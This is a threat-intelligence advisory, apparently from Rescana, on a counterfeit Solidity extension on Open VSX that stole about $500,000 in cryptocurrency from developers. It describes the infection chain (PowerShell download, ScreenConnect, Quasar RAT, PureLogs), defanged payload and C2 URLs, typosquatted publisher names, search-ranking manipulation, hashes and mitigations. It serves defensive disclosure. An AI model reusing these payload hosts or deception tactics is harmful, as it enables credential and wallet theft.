Executive Summary

A highly sophisticated supply-chain attack has been identified targeting blockchain and smart contract developers through a counterfeit Solidity extension distributed on the Open VSX marketplace. This malicious extension, camouflaged as a legitimate development tool, was engineered to compromise developer environments, resulting in the confirmed theft of at least $500,000 in cryptocurrency. The campaign demonstrates advanced threat actor tradecraft, leveraging social engineering, search result manipulation, and a multi-stage malware delivery chain that includes remote access tools and credential stealers. The attackers exploited weaknesses in the extension publishing and ranking mechanisms of Open VSX, enabling the malicious extension to appear more credible and popular than the authentic Solidity extension. The threat remains active, with attackers rapidly re-uploading new variants after takedowns and employing typosquatting techniques to deceive even vigilant users.

Threat Actor Profile

The campaign is attributed to an as-yet unidentified financially motivated threat actor group. The attackers exhibit a high degree of technical sophistication and operational agility, rapidly adapting their tactics in response to takedowns and detection. They have demonstrated expertise in supply-chain compromise, social engineering, and the abuse of legitimate remote access tools such as ScreenConnect. The group’s primary objective is the theft of cryptocurrency and sensitive credentials from blockchain and smart contract developers. No public attribution to a known Advanced Persistent Threat (APT) group has been made as of June 2024. The campaign is notable for its use of commodity malware (such as Quasar RAT and PureLogs credential stealer), as well as its exploitation of open-source software distribution channels and search ranking algorithms to maximize reach and impact.

Technical Analysis of Malware/TTPs

The infection chain begins when a developer installs the fake Solidity Language extension (e.g., solidityai.solidity-1.0.9-universal) from Open VSX. Upon activation, the extension executes a malicious JavaScript payload (extension.js) that downloads and runs a PowerShell script from a remote server (e.g., https://angelic[.]su/files/1.txt). This script checks for the presence of ScreenConnect; if absent, it downloads and installs the tool from https://lmfao[.]su/Bin/ScreenConnect.ClientSetup.msi?e=Access&y=Guest, establishing a connection to the command-and-control (C2) server at relay.lmfao[.]su.

Once remote access is established, the attackers use ScreenConnect to upload and execute additional VBScripts (a.vbs, b.vbs, m.vbs), which in turn fetch further PowerShell payloads from paste.ee and images from archive[.]org containing the VMDetector loader. The final stage involves the deployment of Quasar RAT (an open-source remote access trojan) and a credential stealer detected as HEUR:Trojan-PSW.MSIL.PureLogs.gen. These payloads are designed to exfiltrate browser, email, and cryptocurrency wallet credentials to the C2 infrastructure at 144.172.112[.]84.

The attackers also employed search manipulation techniques, ensuring the fake extension appeared above the legitimate one in Open VSX search results by updating it more frequently and artificially inflating download counts, likely using bots. Typosquatting was used to impersonate the legitimate publisher (juanblanco) with visually similar names such as juanbIanco (using an uppercase "I" instead of a lowercase "l"). The campaign leveraged multiple C2 domains and, in some variants, used the Ethereum blockchain for C2 redundancy (e.g., the SleepyDuck variant).

Indicators of Compromise (IOCs)

Malicious JavaScript hashes include 2c471e265409763024cdc33579c84d88d5aaf9aea1911266b875d3b7604a0eeb, 404dd413f10ccfeea23bfb00b0e403532fa8651bfb456d84b6a16953355a800a, 70309bf3d2aed946bba51fc3eedb2daa3e8044b60151f0b5c1550831fbc6df17, 84d4a4c6d7e55e201b20327ca2068992180d9ec08a6827faa4ff3534b96c3d6f, eb5b35057dedb235940b2c41da9e3ae0553969f1c89a16e3f66ba6f6005c6fa8, and f4721f32b8d6eb856364327c21ea3c703f1787cfb4c043f87435a8876d903b2c. Network IOCs include https://angelic[.]su/files/1.txt, https://angelic[.]su/files/2.txt, https://staketree[.]net/1.txt, https://staketree[.]net/2.txt, https://relay.lmfao[.]su, https://lmfao[.]su/Bin/ScreenConnect.ClientSetup.msi?e=Access&y=Guest, and 144.172.112[.]84. Malicious extension names include solidityai.solidity-1.0.9-universal, juan-bianco.solidity-vlang, and solidity (malicious copycat, publisher: juanbIanco).

The campaign maps to several MITRE ATT&CK techniques, including T1059.001 (Command and Scripting Interpreter: PowerShell), T1071.001 (Application Layer Protocol: Web Protocols), T1204.002 (User Execution: Malicious File), T1105 (Ingress Tool Transfer), T1027 (Obfuscated Files or Information), and T1555 (Credentials from Password Stores).

Exploitation in the Wild

The most significant confirmed incident involved a Russian blockchain developer who suffered a loss of approximately $500,000 in cryptocurrency after installing the fake Solidity extension. The attackers leveraged ScreenConnect to gain persistent remote access, deploy additional malware, and ultimately exfiltrate wallet passphrases and credentials. The malicious extension was downloaded over 54,000 times before being removed from Open VSX, with subsequent variants quickly re-uploaded and, in some cases, download counts inflated to over two million (likely via automated bots). The campaign’s global reach is facilitated by the open nature of Open VSX and the widespread use of AI-powered IDEs such as Cursor AI and Windsurf, which rely on Open VSX for extension distribution.

Victimology and Targeting

The primary targets are blockchain and cryptocurrency developers, particularly those working with smart contracts and utilizing AI-powered IDEs that source extensions from Open VSX. The campaign is global in scope, with confirmed victims in Russia and potential exposure to developers worldwide due to the popularity of VSCode and its derivatives. The attackers specifically targeted environments where high-value digital assets are managed, seeking to maximize financial gain through credential theft and direct wallet compromise. The use of typosquatting and search manipulation increased the likelihood of successful compromise among even security-conscious developers.

Mitigation and Countermeasures

Organizations and individuals should immediately add the identified hashes and domains to endpoint and network blocklists to prevent further compromise. All developer environments should be audited for the presence of unverified or suspicious extensions, especially those matching the IOCs or names listed above. Any unauthorized installations of ScreenConnect or similar remote access tools should be thoroughly investigated, and affected systems should be isolated and forensically analyzed. Credentials for all crypto wallets and sensitive accounts accessed from potentially compromised systems must be rotated without delay.

To prevent future incidents, only install extensions from verified publishers and official repositories, and carefully inspect publisher names for typosquatting (for example, distinguishing between "juanblanco" and "juanbIanco"). Security teams should implement continuous monitoring for anomalous extension installations and remote access tool deployments. User education on the risks of supply-chain attacks and the importance of source verification is also critical.

References

Kaspersky: How extensions from Open VSX were used to steal cryptocurrency, Securelist: The Solidity Language open-source package was used in a $500,000 crypto heist, BleepingComputer: Fake Solidity VSCode extension on Open VSX backdoors developers, Kaspersky Open Source Feed for Malicious Packages

About Rescana

Rescana is a leader in third-party risk management (TPRM), providing organizations with a comprehensive platform to continuously monitor, assess, and mitigate cyber risks across their digital supply chain. Our advanced threat intelligence and automation capabilities empower security teams to proactively identify and respond to emerging threats, ensuring the resilience of your business ecosystem. For questions or further assistance, we are happy to help at ops@rescana.com.